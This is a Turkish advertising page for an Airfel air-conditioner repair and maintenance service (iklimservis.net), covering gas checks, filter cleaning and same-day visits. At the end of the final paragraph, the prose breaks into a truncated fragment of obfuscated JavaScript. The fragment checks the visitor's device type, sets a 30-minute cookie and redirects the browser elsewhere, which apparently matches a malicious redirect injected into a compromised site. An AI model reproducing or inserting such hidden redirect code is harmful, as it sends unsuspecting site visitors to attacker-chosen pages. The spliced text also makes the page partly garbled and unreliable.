Airfel klima servisi

Kolay kullanımı ve verimliliği ile evlerde ve işyerlerinde popüler olan Airfel klimalarınızla ilgili her türlü tamir bakım veya klima montaj işlemleriniz için Airfel klima servisi hizmeti veren iklimservis.net ile iletişime geçebilirsiniz. Gelişmiş hizmet ağı ile adresinize en kısa sürede yönlendirilen teknik servis ekibi arıza tespitine ek olarak klimanızın genel durumu hakkında rapor hizmeti de veriyor.

 

GAZ ÖLÇÜMÜ VE İKLİMLENDİRME DERECESİ

Klasik servis ziyaretlerinin ve alışılmış müşteri – teknik servis ilişkisinin dışına çıkan iklimservis.net adresi ile iletişime geçerek Airfel klima servisi talebinde bulunursanız, klimanızın mevcut arızası ya da bakım durumunun dışında gelecekte doğabilecek arızalar ile yıpranan parçalar bilgisayar sistemi aracılığı ile belirlenerek size bilgi verilir. Herhangi bir ek maliyet çıkarmayan bu işlem ile müşterilerin anlık değil sürekli memnuniyet duymasını amaçlayan iklimservis.net yönetimi kalite odaklı çalışma prensibini sahanın her alanında uygulamaktadır. Klima gazı ölçümü, soğutma ya da ısıtma hataları ile elektriksel sorunlar için hizmet başvurusunda bulunabileceğiniz teknik servis elemanları alanında uzman kalifiye elemanlardır. Titizlikle yürütülen servis hizmeti sırasında klimanızın genel durumu masaya yatırılarak size rapor halinde teslim edilir.

 

KLİMA FİLTRELERİ TEMİZLENMELİ

Airfel klima servisi aracılığı ile alabileceğiniz hizmetlerin yanı sıra yeni kurulum içim Airfel klima montajı hakkında da teknik servis hizmetinden faydalanabilirsiniz. Mevsimsel olarak farklılık gösteren ısıtma ya da soğutma fonksiyonlarının test edilerek kullanıma hazırlanması için Airfel klima bakımı işlemini ilkbahar ya da sonbahar aylarında yaptırmanız tavsiye edilir. Yoğun kullanılan yaz veya kış aylarında hem bakım sırasında klimanın çalışmaması hem de ölçümlerin tam yapılamaması nedeniyle klima bakımlarını zamanında yaptırmak gerekir. Sağlık açısından da son derece önemli olan bakım işlemleri, klimanızın ortam havasını temizlemesi ve filtrelerinde biriken tozu tekrar ortama üflememesi için planlı bir şekilde takip edilmelidir.

 

AİRFEL KLİMA BAKIMI

İletişim numaraları aracılığı ile iklimservis.net servis hizmetine başvurmanız halinde adresinize en yakın ekip yönlendirilerek aynı gün hizmet almanız sağlanır. Vakit kaybetmeden ve kaliteli bir şekilde Airfel klima servisi hizmeti almanız iklimservis.net misyonunun bir gereğidir. Tamir ve bakım işlemleriniz için haftanın her günü bizimle iletişim kurabilirsiniz. |zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

MÜŞTERİ MERKEZİ NUMARAMIZ 0850 304 40 53 HEMEN ARAYIN